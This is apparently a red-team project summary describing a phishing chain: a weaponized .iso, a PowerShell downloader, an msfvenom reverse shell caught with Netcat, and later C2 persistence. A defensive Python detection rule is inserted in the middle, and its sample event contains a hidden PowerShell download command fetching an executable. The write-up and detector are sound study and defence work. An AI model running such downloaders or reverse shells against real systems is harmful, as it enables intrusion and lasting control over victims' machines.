Summary
In this project, a phishing campaign was created using a crafted email with a malicious .iso file attachment. The .iso contained a shortcut that executed a PowerShell-based downloader. The downloader fetched a reverse shell payload generated using msfvenom. A Python web server was used to host the payload, and Netcat was set up to catch the incoming shell. After gaining access, a Command and Control (C2) infrastructure was deployed to maintain persistence on the target system.
Part 1: Pre-Attack Phase (Red Team)
- Created a phishing email with a malicious payload.
- Generated a reverse shell using msfvenom.
- Used PowerShell to craft a .txt shortcut file.
- Hosted payload using a Python web server.
- Prepared Netcat to receive the reverse shell connection.
Part 2: Phishing Attack
- Sent a phishing email containing a weaponized .iso file.
- The .iso executed a downloader that fetched and ran the reverse shell.
- Successfully gained shell access to the target system.
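From the defender's side, the chain above (mounted .iso, shortcut run from explorer.exe, hidden PowerShell fetching a payload) leaves a recognisable process-creation trail. The following is an added example, not part of this project: a small rule run over constructed Sysmon-style Event ID 1 records, assuming the field names Image, ParentImage, CommandLine and CurrentDirectory, and assuming C: is the system drive so that any other drive letter is treated as a mounted or removable volume.

```python
"""Flag process-creation events matching an ISO -> shortcut -> PowerShell downloader chain."""
import re

# Constructed sample events (not real telemetry), shaped like Sysmon Event ID 1 records.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe",
     "CurrentDirectory": "C:\\Users\\alice\\"},          # benign: interactive shell
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://192.0.2.10:8000/x','C:\\Users\\Public\\x.exe')\"",
     "CurrentDirectory": "E:\\"},                        # shortcut launched from a mounted image
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\inventory.ps1",
     "CurrentDirectory": "C:\\Scripts\\"},              # benign: scheduled script
]

# Common PowerShell download cradles and the hidden-window switch.
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
SYSTEM_DRIVE = "C:"  # assumption: anything else is a mounted/removable volume


def suspicious_reasons(ev):
    """Return the indicators an event matches; an empty list means the rule did not fire."""
    if not ev["Image"].lower().endswith("powershell.exe"):
        return []
    reasons = []
    if DOWNLOAD_RE.search(ev["CommandLine"]):
        reasons.append("download-cradle")
    if HIDDEN_RE.search(ev["CommandLine"]):
        reasons.append("hidden-window")
    # A double-clicked shortcut runs under explorer.exe; a mounted .iso gets its own drive letter.
    if (ev["ParentImage"].lower().endswith("\\explorer.exe")
            and not ev["CurrentDirectory"].upper().startswith(SYSTEM_DRIVE)):
        reasons.append("explorer-child-on-mounted-volume")
    # Require the cradle plus at least one context indicator to keep noise down.
    return reasons if "download-cradle" in reasons and len(reasons) >= 2 else []


def detect(events):
    """Return (index, reasons) for every event that trips the rule."""
    hits = [(i, suspicious_reasons(ev)) for i, ev in enumerate(events)]
    return [(i, r) for i, r in hits if r]


if __name__ == "__main__":
    for i, reasons in detect(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(reasons)}")
```

In production this should be correlated with the volume-mount event itself rather than inferred from the drive letter alone.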
Part 3: Command and Control (Red Team)
- Used the reverse shell to deploy a Command and Control (C2) framework.
- Maintained persistent access to the compromised system.
- Enabled communication with the target for further control and exploitation.
- Prepared the environment for multi-host compromise via the C2 infrastructure.